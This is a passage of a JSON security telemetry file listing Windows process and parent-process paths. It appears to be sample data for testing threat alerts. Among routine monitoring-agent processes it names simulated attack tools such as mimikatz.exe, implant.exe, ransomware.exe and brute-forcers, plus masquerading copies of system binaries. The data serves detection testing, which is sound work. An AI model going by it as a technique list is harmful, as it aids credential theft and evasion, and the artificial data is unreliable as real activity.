State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\"],\"ParentProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 